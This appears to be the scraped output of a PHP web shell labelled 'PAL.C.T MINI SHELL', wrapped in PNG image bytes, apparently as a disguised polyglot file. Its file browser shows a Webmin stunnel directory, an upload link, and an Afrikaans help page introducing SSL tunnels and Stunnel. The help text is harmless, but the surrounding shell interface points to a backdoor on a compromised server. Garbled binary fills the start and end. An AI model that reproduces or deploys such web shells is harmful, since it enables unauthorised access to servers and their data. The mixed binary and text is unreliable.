php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.af.auto.html

<header> Inleiding tot SSL-tonnels </header> SSL is &#39;n protokol vir die kodering van data in &#39;n TCP-verbinding as dit oor die netwerk beweeg. Dit is oorspronklik ontwikkel om die verkeer tussen webblaaiers en bedieners te beskerm, maar kan gebruik word om enige vorm van datastrome wat normaalweg via die TCP-protokol gestuur sou word, te enkripteer. <p> Die SSL-protokol stel kliënte en bedieners in staat om hulself aan mekaar te verifieer, sodat &#39;n kliënt seker kan wees dat dit regtig verbind met die gasheer wat hy dink. Dit word gedoen met behulp van sertifikate wat uitgereik word deur &#39;n sertifikaatowerheid wat deur die kliënt erken word (sodat dit geverifieer kan word) en wat aan &#39;n spesifieke gasheernaam gekoppel is. Sonder sertifikate kan &#39;n aanvaller &#39;n SSL-verbinding na sy eie bediener herlei en sensitiewe inligting opneem van &#39;n kliënt wat dink dat hy met die regte bediener praat. <p> Enige data wat ongeënkripteer oor die internet beweeg, kan deur &#39;n aanvaller vasgelê en gelees word met toegang tot een van die netwerke wat dit deurgaan. Selfs data wat tussen &#39;n kliënt en bedienersisteem op &#39;n LAN reis, kan maklik ingeskakel word. As u aan &#39;n telnet-, FTP- of POP3-bediener koppel, word u wagwoord oor die netwerk gestuur en dit kan deur &#39;n aanvaller vasgelê word. <p> SSL kan gebruik word om data in sulke situasies te beskerm, maar slegs as die kliënt en bediener dit ondersteun. Die meeste webblaaiers en e-poskliënte kan SSL-gekodeerde HTTP-, POP3- en IMAP-verbindings maak, maar nie alle web- en POP3-bedieners kan dit aanvaar nie. POP3 is in die besonder moeilik om te beskerm, omdat die standaardbediener wat met die meeste Unix-stelsels bestaan, glad nie SSL ondersteun nie. Gelukkig is daar egter &#39;n oplossing - Stunnel. <p> Stunnel is &#39;n eenvoudige program wat &#39;n ongeënkripteerde verbinding omskakel in &#39;n SSL-versleutelde verbinding. Dit is gewoonlik opgestel om vanaf &#39;n superbediener, soos inetd of xinetd, bestuur te word, en voer dan &#39;n ander program aan, soos die POP3-bediener wat nie SSL ondersteun nie. Met hierdie ontwerp kan dit bedieners wat normaalweg vanaf inetd bestuur word, soos telnet-, NNTP- en IMAP-bedieners, beskerm. <p> Nie alle bedieners kan egter nuttig beskerm word met enkripsie nie, omdat daar geen kliënt bestaan om dit in SSL-modus te gebruik nie. Ek het byvoorbeeld nog nooit van &#39;n telnet- of FTP-kliënt gehoor wat SSL kan gebruik nie, want die algemene SSH-pakket laat reeds geïnkripteer afstandsaanmeldings en oordragte van lêers toe. <p> Hierdie Webmin-module maak dit maklik om superbedienerdienste op te stel wat STunnel bedryf om een of ander bedienerprogram te begin. Alhoewel dit met die hand van die Internet Services-module met die hand gedoen kan word, is hierdie een spesifiek ontwerp om STunnel op te stel en te konfigureer. Dit bespeur outomaties of u inetd en / of xinetd geïnstalleer het, lees hul konfigurasies om na te gaan vir bestaande SSL-tonnels en voeg dit by wanneer u &#39;n nuwe tonnel skep. As albei geïnstalleer word, word nuwe SSL-tonnels bygevoeg tot die xinetd-konfigurasie, want dit is volgens my mening die beste van die twee. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`